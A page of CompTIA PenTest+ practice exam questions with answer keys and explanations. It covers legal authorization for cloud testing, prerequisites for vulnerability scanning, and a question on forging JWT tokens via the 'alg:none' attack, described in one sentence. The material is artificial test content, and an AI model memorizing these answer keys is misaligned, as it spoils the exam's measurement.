
CompTIA often tests the misconception that operational security tasks like patching or encryption are the primary legal concerns in a shared responsibility model, when in fact the critical legal issue is obtaining explicit authorization from the cloud provider to avoid violating their terms of service or anti-hacking laws.

How to eliminate wrong answers

Option A is wrong because patching the operating system is a shared responsibility that varies by service model (e.g., IaaS vs. PaaS), but it is an operational security task, not a legal authorization issue that must be clarified in the rules of engagement to avoid legal issues. Option C is wrong because encryption methods for data at rest are a security control configuration, not a legal authorization requirement; while important for data protection, they do not address the legal risk of unauthorized testing against the cloud provider's infrastructure.

899
Multi-Selectmedium

A penetration tester is planning to perform a vulnerability scan of an internal network. Which of the following should be considered before scanning? (Choose three.)

Select 3 answers
A.Obtain written authorization from the client
B.Define the scope and rules of engagement
C.Perform the scan during peak business hours
D.Ensure the scanning tool is updated with latest signatures
E.Test all available exploit modules
AnswersA, B, D

Authorization is essential to avoid legal issues.

Why this answer

Option A is correct because written authorization from the client is a legal and ethical prerequisite before any scanning activity. Without explicit permission, the penetration tester could be liable for unauthorized access under laws like the Computer Fraud and Abuse Act (CFAA) or similar regulations, as vulnerability scanning involves sending probes that may trigger intrusion detection systems or cause unintended disruptions.

Exam trap

The trap here is that candidates confuse vulnerability scanning with exploitation, assuming that testing exploits (Option E) is part of the scan, when in fact scanning is passive detection and exploitation requires separate authorization and a different phase.

900
MCQhard

During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?

A.JWT algorithm confusion attack (alg:none)
B.JWT timing attack
C.JWT kid injection
D.JWT brute-force of the secret
AnswerA

The alg:none attack bypasses signature verification.

Why this answer

If the server accepts the 'none' algorithm, the tester can forge tokens by setting the algorithm to 'none' and removing the signature.

Page 11

Page 12 of 14

Page 13
CompTIA PenTest+ PT0-002 PT0-002 Questions 826–900 | Page 12/14 | Courseiva